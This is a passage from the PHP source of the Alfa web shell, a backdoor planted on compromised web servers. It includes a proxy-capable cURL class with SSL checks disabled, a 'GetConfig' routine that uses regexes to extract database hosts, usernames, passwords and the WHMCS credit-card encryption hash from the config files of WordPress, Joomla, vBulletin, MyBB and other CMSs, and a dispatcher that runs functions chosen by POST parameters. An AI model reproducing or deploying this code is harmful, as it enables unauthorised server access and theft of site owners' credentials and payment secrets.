6127return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
6128}
6129class AlfaCURL {
6130public $headers;
6131public $user_agent;
6132public $compression;
6133public $cookie_file;
6134public $proxy;
6135public $path;
6136public $ssl = false;
6137public $curl_status = true;
6138function __construct($cookies=false,$compression='gzip',$proxy=''){
6139if(!extension_loaded('curl')){$curl_status = false;return false;}
6140$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
6141$this->headers[] = 'Connection: Keep-Alive';
6142$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
6143$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
6144$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
6145$this->compression=$compression;
6146$this->proxy=$proxy;
6147$this->cookies=$cookies;
6148if($this->cookies)$this->cookie($this->path);
6149}
6150function cookie($cookie_file) {
6151if (_alfa_file_exists($cookie_file,false)) {
6152$this->cookie_file=$cookie_file;
6153}else{
6154@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
6155$this->cookie_file=$cookie_file;
6156@fclose($this->cookie_file);
6157}
6158}
6159function Send($url,$method="get",$data=""){
6160if(!$this->curl_status){return false;}
6161$process = curl_init($url);
6162curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
6163curl_setopt($process, CURLOPT_HEADER, 0);
6164curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
6165curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
6166curl_setopt($process, CURLOPT_ENCODING , $this->compression);
6167curl_setopt($process, CURLOPT_TIMEOUT, 30);
6168if($this->ssl){
6169curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
6170curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
6171}
6172if($this->cookies){
6173curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
6174curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
6175}
6176if($this->proxy){
6177curl_setopt($process, CURLOPT_PROXY, $this->proxy);
6178}
6179if($method=='post'){
6180curl_setopt($process, CURLOPT_POSTFIELDS, $data);
6181curl_setopt($process, CURLOPT_POST, 1);
6182curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
6183}
6184$return = curl_exec($process);
6185curl_close($process);
6186return $return;
6187}
6188function error($error) {
6189echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
6190die;
6191}
6192}
6193function getConfigHtml($cms){
6194$content = '';
6195$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
6196$content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
6197foreach($cms_array as $key => $val){
6198$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
6199}
6200$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
6201$content .= "</form>";
6202return $content;
6203}
6204function alfaGetConfig(){
6205$cms = $_POST['alfa1'];
6206$path = trim($_POST['alfa2']);
6207$config = array(
6208'wp'=>array('file'=>'/wp-config.php',
6209'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6210'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6211'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6212'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6213'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6214),
6215'drupal'=>array('file'=>'/config.php',
6216'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6217'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6218'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6219'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6220'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
6221),
6222'vb'=>array('file'=>'/includes/config.php',
6223'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6224'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6225'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6226'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6227'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6228),
6229'phpnuke'=>array('file'=>'/config.php',
6230'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6231'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6232'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6233'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6234'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
6235),
6236'smf'=>array('file'=>'/Settings.php',
6237'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6238'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6239'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6240'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6241'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6242),
6243'whmcs'=>array('file'=>'/configuration.php',
6244'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6245'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6246'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6247'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6248'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6249),
6250'joomla'=>array('file'=>'/configuration.php',
6251'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6252'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6253'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6254'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6255'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6256),
6257'phpbb'=>array('file'=>'/config.php',
6258'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6259'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6260'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6261'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6262'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6263),
6264'mybb'=>array('file'=>'/inc/config.php',
6265'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6266'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6267'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6268'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6269'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6270)
6271);
6272$data = array();
6273$srch_host = $config[$cms]['host'][0];
6274$srch_user = $config[$cms]['dbuser'][0];
6275$srch_name = $config[$cms]['dbname'][0];
6276$srch_pw = $config[$cms]['dbpw'][0];
6277$prefix = $config[$cms]['prefix'][0];
6278$file = $config[$cms]['file'];
6279$chost = $config[$cms]['host'][1];
6280$cuser = $config[$cms]['dbuser'][1];
6281$cname = $config[$cms]['dbname'][1];
6282$cpw = $config[$cms]['dbpw'][1];
6283$cprefix = $config[$cms]['prefix'][1];
6284if(@is_dir($path)||_alfa_is_dir($path)){
6285$file=$path.$file;
6286}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
6287$file=$path;
6288}else{
6289return false;
6290}
6291$file = __read_file($file);
6292if(preg_match($srch_host, $file, $mach)){
6293$data['host'] = $mach[$chost];
6294}
6295if(preg_match($srch_user, $file, $mach)){
6296$data['user'] = $mach[$cuser];
6297}
6298if(preg_match($srch_name, $file, $mach)){
6299$data['dbname'] = $mach[$cname];
6300}
6301if(preg_match($srch_pw, $file, $mach)){
6302$data['password'] = $mach[$cpw];
6303}
6304if(isset($prefix)){
6305if(preg_match($prefix, $file, $mach)){
6306$data['prefix'] = $mach[$cprefix];
6307}
6308}
6309if($cms=='whmcs'){
6310if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
6311$data['cc_encryption_hash'] = $mach[3];
6312}
6313}
6314echo json_encode($data);
6315}
6316if(empty($_POST['a']))
6317if(isset($default_action) && function_exists('alfa' . $default_action))
6318$_POST['a'] = $default_action;
6319else
6320$_POST['a'] = 'FilesMan';
6321if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
6322call_user_func('alfa' . $_POST['a']);
6323exit;
6324/*
6325#Persian Gulf For Ever
6326#skype : sole.sad
6327#skype : ehsan.invisible
6328*/
6329?>